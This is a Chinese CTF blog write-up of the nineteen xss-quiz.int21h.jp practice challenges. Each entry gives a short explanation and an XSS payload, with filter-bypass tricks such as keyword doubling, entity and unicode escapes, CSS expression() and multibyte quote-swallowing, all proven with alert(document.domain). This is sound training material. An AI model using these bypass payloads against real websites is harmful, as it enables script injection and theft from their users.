<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="xss,">










<meta name="description" content="很久以前学了xss，但是没有系统的刷过题，前几天看国际赛的题目有几题xss的题目，感觉还是不是很熟，干脆找个平台来做一做。这个是一个日本人写的平台，http://xss-quiz.int21h.jp/ ，边做边记下   Challenge 1emmm，会点html和js都能秒过，完全是裸题，直接在输入框输入1&amp;lt;script&amp;gt;alert(document.domain);&amp;lt;/scr">
<meta name="keywords" content="xss">
<meta property="og:type" content="article">
<meta property="og:title" content="xss challenge 刷题记录">
<meta property="og:url" content="https://xi4or0uji.github.io/2019/01/17/2018-10-29-xss-challenge-刷题记录/index.html">
<meta property="og:site_name" content="蒟蒻的ctf博客">
<meta property="og:description" content="很久以前学了xss，但是没有系统的刷过题，前几天看国际赛的题目有几题xss的题目，感觉还是不是很熟，干脆找个平台来做一做。这个是一个日本人写的平台，http://xss-quiz.int21h.jp/ ，边做边记下   Challenge 1emmm，会点html和js都能秒过，完全是裸题，直接在输入框输入1&amp;lt;script&amp;gt;alert(document.domain);&amp;lt;/scr">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://xi4or0uji.github.io/images/xss1/1.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/xss1/2.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/xss1/3.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/xss1/4.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/xss1/5.png">
<meta property="og:updated_time" content="2019-01-17T08:28:42.181Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="xss challenge 刷题记录">
<meta name="twitter:description" content="很久以前学了xss，但是没有系统的刷过题，前几天看国际赛的题目有几题xss的题目，感觉还是不是很熟，干脆找个平台来做一做。这个是一个日本人写的平台，http://xss-quiz.int21h.jp/ ，边做边记下   Challenge 1emmm，会点html和js都能秒过，完全是裸题，直接在输入框输入1&amp;lt;script&amp;gt;alert(document.domain);&amp;lt;/scr">
<meta name="twitter:image" content="https://xi4or0uji.github.io/images/xss1/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://xi4or0uji.github.io/2019/01/17/2018-10-29-xss-challenge-刷题记录/">





  <title>xss challenge 刷题记录 | 蒟蒻的ctf博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">蒟蒻的ctf博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://xi4or0uji.github.io/2019/01/17/2018-10-29-xss-challenge-刷题记录/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xi4or0uji">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="蒟蒻的ctf博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">xss challenge 刷题记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-17T16:24:52+08:00">
                2019-01-17
              </time>
            

            

            
          </span>
		  


          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/01/17/2018-10-29-xss-challenge-刷题记录/" class="leancloud_visitors" data-flag-title="xss challenge 刷题记录">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>很久以前学了xss，但是没有系统的刷过题，前几天看国际赛的题目有几题xss的题目，感觉还是不是很熟，干脆找个平台来做一做。<br>这个是一个日本人写的平台，<a href="http://xss-quiz.int21h.jp/" target="_blank" rel="noopener">http://xss-quiz.int21h.jp/</a> ，边做边记下  </p>
<h3 id="Challenge-1"><a href="#Challenge-1" class="headerlink" title="Challenge 1"></a>Challenge 1</h3><p>emmm，会点html和js都能秒过，完全是裸题，直接在输入框输入<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="built_in">document</span>.domain);<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>就能过了  </p>
<h3 id="Challenge-2"><a href="#Challenge-2" class="headerlink" title="Challenge 2"></a>Challenge 2</h3><p>还是水题，源码看见有个双引号，闭合一下就能进行触发了，<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;</span></span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-3"><a href="#Challenge-3" class="headerlink" title="Challenge 3"></a>Challenge 3</h3><p>这题注入点不是在输入框，是在国家，改下包就行了<br><img src="/images/xss1/1.png" alt=""></p>
<h3 id="Challenge-4"><a href="#Challenge-4" class="headerlink" title="Challenge 4"></a>Challenge 4</h3><p>这题会对符号进行转义，闭合一下前面的，然后插入代码<br><img src="/images/xss1/2.png" alt=""></p>
<h3 id="Challenge-5"><a href="#Challenge-5" class="headerlink" title="Challenge 5"></a>Challenge 5</h3><p><img src="/images/xss1/3.png" alt=""><br>这题限制了输入长度，可以在前端页面改一下maxlength，也可以直接抓包改，然后还是能弹的  </p>
<h3 id="Challenge-6"><a href="#Challenge-6" class="headerlink" title="Challenge 6"></a>Challenge 6</h3><p>这题闭合一下前面的值，加个onmouseover属性就能触发了<br><img src="/images/xss1/4.png" alt=""></p>
<h3 id="Challenge-7"><a href="#Challenge-7" class="headerlink" title="Challenge 7"></a>Challenge 7</h3><p>这题跟上一题差不多，过滤了&lt;&gt;，还是可以继续用onmouseover去触发，图基本一样，就不放了  </p>
<h3 id="Challenge-8"><a href="#Challenge-8" class="headerlink" title="Challenge 8"></a>Challenge 8</h3><p>这题提示了javascript sheme，scheme 属性设置或返回用于解释 content 属性的值的格式。在连接插入js伪链接然后弹窗<br><img src="/images/xss1/5.png" alt=""></p>
<h3 id="Challenge-9"><a href="#Challenge-9" class="headerlink" title="Challenge 9"></a>Challenge 9</h3><p>这题转义了&lt;&gt;”，正确的解法应该是utf-7编码，然后再去输入弹窗，但是我找不到thf-7转码工具，然后用上一题的方法也能苟过去，佛辣  </p>
<h3 id="Challenge-10"><a href="#Challenge-10" class="headerlink" title="Challenge 10"></a>Challenge 10</h3><p>这关可以看到，过滤了domian，但是我们可以通过重复关键词去进行绕过<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&lt;script&gt;alert(document.domadomainin);&lt;/script&gt;</span></span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-11"><a href="#Challenge-11" class="headerlink" title="Challenge 11"></a>Challenge 11</h3><p>这关对script和on开头的字符串都进行了过滤，也就是说script和onmouseover还有onclick都是不行的，所以只能用a标签去试一下<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"&gt;<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert(document.domain);"</span>&gt;</span><span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>但是script是被过滤了，不过可以用一个unicode编码去进行绕过，最终payload：<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"&gt;<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascri&amp;#09pt:alert(document.domain)</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-12"><a href="#Challenge-12" class="headerlink" title="Challenge 12"></a>Challenge 12</h3><p>“s/[\x00-\x20\&lt;>\”\’]//g;”，这个过滤有丶真实，&lt;&gt;”‘，0x00到0x20之间的符号也会被过滤掉<br>emmm，网上的wp都说<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">``onmouseover=alert(document.domain);&gt;</span><br></pre></td></tr></table></figure></p>
<p>可以绕过，但是要在ie的浏览器下，肉鸡电脑没有ie，苟过去了苟过去了（逃</p>
<h3 id="Challenge-13"><a href="#Challenge-13" class="headerlink" title="Challenge 13"></a>Challenge 13</h3><p>这题提示了style attribute，可以在CSS样式中利用expression去实现javascript中的onmouseover或者onmouseout事件，但是也是要ie（版本8以下）…………<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aa:expression(onmouseover=function()&#123;alert(document.domain)&#125;)</span><br></pre></td></tr></table></figure></p>
<p>还有另一种方式，利用background去修改css样式<br><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">background-color</span>:<span class="selector-id">#ff0000</span>;<span class="selector-tag">background</span><span class="selector-pseudo">:url("javascript</span><span class="selector-pseudo">:alert(document.domain)</span>;");</span><br></pre></td></tr></table></figure></p>
<p>但是也复现不了，不知道为什么……</p>
<h3 id="Challenge-14"><a href="#Challenge-14" class="headerlink" title="Challenge 14"></a>Challenge 14</h3><p>提示s/(url|script|eval|expression)/xxx/ig;，可以看到script和expression都是被过滤了的，但是其实可以在中间引入注释符，然后成功绕过，利用实体字符进行编码绕过是不行的，过滤了&amp;，但是进行unicode是可以的，最后的payload其实跟上一题差不多，但是有个问题，也是要ie浏览器<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">aa:exp/**/ression(onmouseover=function()&#123;alert(document.domain)&#125;)</span><br><span class="line">aa:expre\0ssion(onmouseover=function()&#123;alert(document.domain)&#125;)</span><br><span class="line">aa:expr\0056ssion(onmouseover=function()&#123;alert(document.domain)&#125;)</span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-15"><a href="#Challenge-15" class="headerlink" title="Challenge 15"></a>Challenge 15</h3><p>利用document.write去写入javascript，但是转义了&lt;&gt;，可以用十六进制去进行绕过，最后payload<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\\x3cscript\\x3ealert(<span class="built_in">document</span>.domain);\\x3c/script\\x3e</span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-16"><a href="#Challenge-16" class="headerlink" title="Challenge 16"></a>Challenge 16</h3><p>这题跟上一题考点一样，但是提示看到了\\x会转成\\\\x，所有十六进制绕过是不行的了，尝试一下unicode编码<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\u003cscript\u003ealert(<span class="built_in">document</span>.domain);\u003c/script\u003e</span><br></pre></td></tr></table></figure></p>
<p>也可以八进制<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\\<span class="number">74</span>img src=x onerror=alert(<span class="built_in">document</span>.domain)\\<span class="number">76</span></span><br></pre></td></tr></table></figure></p>
<h3 id="Challenge-17"><a href="#Challenge-17" class="headerlink" title="Challenge 17"></a>Challenge 17</h3><p>这题跟宽字节注入有点像，将双引号吞了，然后进行注入，但是这个有个要求，要在老ie（6以下版本）才能进行<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p1=<span class="number">1</span>%A7&amp;p2=+onmouseover%<span class="number">3</span>Dalert%<span class="number">28</span><span class="built_in">document</span>.domain%<span class="number">29</span>%<span class="number">3</span>B+%A7</span><br></pre></td></tr></table></figure></p>
<p>吞掉p1后面的引号就可以让p1第一个引号和p2的第一个引号闭合起来，然后后面再插入我们的代码，弹个domain，最后再把p2第二个引号闭合起来，就可以实现注入了</p>
<h3 id="Challenge-18"><a href="#Challenge-18" class="headerlink" title="Challenge 18"></a>Challenge 18</h3><p>这题的操作有点骚，因为对”&lt;&gt;都进行了转义，所以我们要对他们进行处理，先看”的十六进制：00100010，&gt;的十六进制：00101110，&lt;的十六进制：00111100，然后我们将最高位全部换成1，也就是10100010、10111110、10111100，转化过来就是%A2、%BE、%BC，最后的payload就是<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%A2%BE%BCscript%BEalert(<span class="built_in">document</span>.domain);%BC/script%BE</span><br></pre></td></tr></table></figure></p>
<p>但是这个也是有个前提，要在ie6以下才能成功</p>
<h3 id="Challenge-19"><a href="#Challenge-19" class="headerlink" title="Challenge 19"></a>Challenge 19</h3><p>这题可以找到原来的漏洞<a href="https://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html" target="_blank" rel="noopener">https://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html</a><br>但是我去实现的时候总是返回404页面，看大佬的博客看见火狐是不能返回的，要用ie8，溜了溜了，颓了颓了  </p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/17/2018-10-27-hacklu-2018-Baby-PHP/" rel="next" title="hacklu 2018 Baby PHP">
                <i class="fa fa-chevron-left"></i> hacklu 2018 Baby PHP
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/17/2018-10-31-百度杯-ctf-九月场/" rel="prev" title="百度杯 ctf 九月场">
                百度杯 ctf 九月场 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Xi4or0uji">
            
              <p class="site-author-name" itemprop="name">Xi4or0uji</p>
              <p class="site-description motion-element" itemprop="description">还在路上</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">37</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-1"><span class="nav-number">1.</span> <span class="nav-text">Challenge 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-2"><span class="nav-number">2.</span> <span class="nav-text">Challenge 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-3"><span class="nav-number">3.</span> <span class="nav-text">Challenge 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-4"><span class="nav-number">4.</span> <span class="nav-text">Challenge 4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-5"><span class="nav-number">5.</span> <span class="nav-text">Challenge 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-6"><span class="nav-number">6.</span> <span class="nav-text">Challenge 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-7"><span class="nav-number">7.</span> <span class="nav-text">Challenge 7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-8"><span class="nav-number">8.</span> <span class="nav-text">Challenge 8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-9"><span class="nav-number">9.</span> <span class="nav-text">Challenge 9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-10"><span class="nav-number">10.</span> <span class="nav-text">Challenge 10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-11"><span class="nav-number">11.</span> <span class="nav-text">Challenge 11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-12"><span class="nav-number">12.</span> <span class="nav-text">Challenge 12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-13"><span class="nav-number">13.</span> <span class="nav-text">Challenge 13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-14"><span class="nav-number">14.</span> <span class="nav-text">Challenge 14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-15"><span class="nav-number">15.</span> <span class="nav-text">Challenge 15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-16"><span class="nav-number">16.</span> <span class="nav-text">Challenge 16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-17"><span class="nav-number">17.</span> <span class="nav-text">Challenge 17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-18"><span class="nav-number">18.</span> <span class="nav-text">Challenge 18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Challenge-19"><span class="nav-number">19.</span> <span class="nav-text">Challenge 19</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xi4or0uji</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("kjsqHE2szT8D8zBgcoS3IuDJ-gzGzoHsz", "W2CzS27kkRW94qWAYaaWlnX7");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
